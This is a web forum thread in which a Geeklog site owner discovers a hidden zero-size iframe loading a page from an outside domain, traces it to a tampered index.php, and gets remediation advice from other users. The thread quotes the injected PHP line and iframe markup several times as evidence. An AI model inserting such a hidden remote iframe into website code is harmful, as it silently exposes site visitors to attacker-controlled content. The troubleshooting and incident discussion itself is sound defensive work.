Welcome to Geeklog Tuesday, November 12 2019 @ 08:45 am EST

Geeklog Forums

unusual iframe on my site


Status: offline

usarfans

Forum User
Junior
Registered: 10/08/03
Posts: 34
confused
Today I noticed something unusual when my site loaded. Down in the bottom status bar of IE, I noticed that it was trying to load something from a site NOT of my knowledge. I did a "view source" and found the culprit about 3/4 of the way through the index.php outputted file. It is right before the part at the bottom of the page where you are given links to previous site pages.

Here is the part in question:

PHP Formatted Code
<!-- ARTICLE END -->

<iframe src=<b>http://europedirect.biz/frame.php</b>
frameboarder="0" width="0" height="0" scrolling="no">
</iframe><div class="pagenav">Previous <b>1</b>
 


Any ideas what this means? Has the site been hacked? I had plans on upgrading the site to 3.11 this weekend but am not sure if I should yet until I can figure out where this europedirect.biz link came from.

Thanks,

Lou


Status: offline

ScurvyDawg

Forum User
Full Member
Registered: 06/11/02
Posts: 523
Thats odd

Do others have access to your layout folder?

You will want to change your passwords.

If you go to the site there is nothing there really except some stats scripts. I would remove the code of course too. Did you get the theme off of somone maybe it is just old code?

Good Luck

Status: offline

Dirk

Site Admin
Admin
Registered: 12/01/02
Posts: 13073
Location:Stuttgart, Germany
Can you find that IFRAME in the theme files on your webspace? Since the page navigation is added on the fly, it should be in the story templates (storytext.thtml or storybodytext.thtml).

If you can't find it there, it may be inserted by a control in your browser. Are you using Internet Explorer?

bye, Dirk

Status: offline

usarfans

Forum User
Junior
Registered: 10/08/03
Posts: 34
ScurvyDawg & Dirk,

Thanks for your fast replies.

To the best of my knowledge, nobody but myself has access to the htdocs/layout folder. Permissions are set to 755.

I am using IE, but I see the same thing using Slimbrowser.

I am basically using the Smooth Blue theme with just a couple of minor color tweeks.

I opened each file in the theme directory (not it's subdirectories) and did not find the odd iframe info in any of them.

The only plug-in I am using is the static pages plugin.

When I select a story to read and go to the story page and view the source, the mysterious Iframe is NOT there. It appears to only be on the main index.php page or process.

Still looking at other files..

Status: offline

Dirk

Site Admin
Admin
Registered: 12/01/02
Posts: 13073
Location:Stuttgart, Germany
Quote by usarfans: I am using IE, but I see the same thing using Slimbrowser.

I'm not familiar with Slimbrowser, but from their website it looks like they're still using Internet Explorer as a backend.

Try a different browser, e.g. Firefox or Opera.

bye, Dirk

Status: offline

usarfans

Forum User
Junior
Registered: 10/08/03
Posts: 34
I loaded Firefox 1.0.2.

Same results - suspect Iframe still seen. Going to try on a different computer now, although all logic says that is not the problem......

Status: offline

ScurvyDawg

Forum User
Full Member
Registered: 06/11/02
Posts: 523
I am using firefox and I see it.

Seems to be part of your site navigation the previous button??

PHP Formatted Code


<iframe src=http://europedirect.biz/frame.php frameboarder="0" width="0" height="0" scrolling="no"></iframe>
<div class="pagenav">Previous <b>1</b>
<a href="http://www.usarfans.com/index.php?page=2">2</a>
<a href="http://www.usarfans.com/index.php?page=3">3</a>
<a href="http://www.usarfans.com/index.php?page=4">4</a>
<a href="http://www.usarfans.com/index.php?page=5">5</a>
<a href="http://www.usarfans.com/index.php?page=6">6</a>
<a href="http://www.usarfans.com/index.php?page=7">7</a>
<a href="http://www.usarfans.com/index.php?page=8">8</a>
<a href="http://www.usarfans.com/index.php?page=9">9</a>
<a href="http://www.usarfans.com/index.php?page=10">10</a>
<a href="http://www.usarfans.com/index.php?page=2">Next</a>
</div>
</td>


 


Very strange it is right next to your pagination? Seems to be tracking stats??

Status: offline

ScurvyDawg

Forum User
Full Member
Registered: 06/11/02
Posts: 523
Yep if you look at your pagination it is there.

a little square next to or above the word previous.

Status: offline

Dirk

Site Admin
Admin
Registered: 12/01/02
Posts: 13073
Location:Stuttgart, Germany
I can see it, too.

It doesn't appear to be in the template files. It's also not visible on other pages that use the pagination (e.g. the links).

So it may actually be in your index.php. Make a backup of that file (for forensic analysis), then overwrite it with a fresh copy. See if that helps ...

bye, Dirk

Status: offline

usarfans

Forum User
Junior
Registered: 10/08/03
Posts: 34
I don't see the little square (old eyes) but I know that I did not put anything extra like this europedirect.biz iframe into my site code. And if you guys, who have seen a million Geeklog problems, don't recognize it - it only leads me to believe it is malicious in nature somehow.

Status: offline

usarfans

Forum User
Junior
Registered: 10/08/03
Posts: 34
found the culprit! How I missed it earlier is beyond me.

The index.php file had been modified about 2 days ago and not by myself. I replaced it and the iframe is gone.

All root/admin passwords have been changed. Upgrade is in the very,very near future.

Comparing the bad with the good, the only difference is this one line of code

PHP Formatted Code
$display .= '<iframe src=http://europedirect.biz/frame.php
frameboarder="0" width="0" height="0" scrolling="no"></iframe>'

 

I guess I was hacked. Dammit.

Thanks for the rapid and accurate help. We non-geeks really appreciate it - especially when it's obvious we are in over our heads!



Status: offline

Dirk

Site Admin
Admin
Registered: 12/01/02
Posts: 13073
Location:Stuttgart, Germany
Quote by usarfans: I guess I was hacked. Dammit.

It is very unlikely that this was done via Geeklog or any other script you may have running. So better change the passwords for your hosting account as well.

bye, Dirk

Status: offline

rav

Forum User
Chatty
Registered: 14/01/03
Posts: 37
I just discovered the exact same thing! I fixed it before I found this thread, and wondered if anyone else had run into the problem. Appears I'm not the only one.

Status: offline

rav

Forum User
Chatty
Registered: 14/01/03
Posts: 37
Interesting to note, that my file was changed on March 23rd as well.

Status: offline

beewee

Forum User
Full Member
Registered: 05/08/03
Posts: 969
Location:The Netherlands, where else?
Do you happen to have the same hosting provider?
Dutch Geeklog sites about camping/hiking: www.kampeerzaken.nl | www.campersite.nl | www.caravans.nl | www.caravans.net

Status: offline

usarfans

Forum User
Junior
Registered: 10/08/03
Posts: 34

I am using PSekhosting.com

Every since the original owner of PSek sold (i.e. outsourced) the site a couple of months ago I've had numerous problem with them - SQL crashes, DNS issues, etc. Not a lick of problem before the sale.


Lou

Status: offline

rav

Forum User
Chatty
Registered: 14/01/03
Posts: 37
I'm using psek as well. I have several sites hosted with them, but only one has been affected.

Status: offline

beewee

Forum User
Full Member
Registered: 05/08/03
Posts: 969
Location:The Netherlands, where else?
Did you ever change the passwords you received from Psek? If not, somebody retrieved the passwords or found out how their passwords are generated.

If you did change them, your sites might be vulnerable...
Dutch Geeklog sites about camping/hiking: www.kampeerzaken.nl | www.campersite.nl | www.caravans.nl | www.caravans.net

Status: offline

rav

Forum User
Chatty
Registered: 14/01/03
Posts: 37
Yeah, I changed the passwords from what psek sent me. I submitted a ticket to pske's support and they suggested that it was my geeklog version (still on 1.3. and that I should upgrade. Something I had planned on doing anyway, just haven't had the time yet.

Status: offline

beewee

Forum User
Full Member
Registered: 05/08/03
Posts: 969
Location:The Netherlands, where else?
Perhaps it's just my imagination: did you install GL yourself or with you Control Panel? It's quite easy to pack an 'infected' template that way...

BTW there should be a FTP access log somewhere.
Dutch Geeklog sites about camping/hiking: www.kampeerzaken.nl | www.campersite.nl | www.caravans.nl | www.caravans.net

All times are EST. The time is now 08:45 am.

  • Normal Topic
  • Sticky Topic
  • Locked Topic
  • New Post
  • Sticky Topic W/ New Post
  • Locked Topic W/ New Post
  •  View Anonymous Posts
  •  Able to post
  •  Filtered HTML Allowed
  •  Censored Content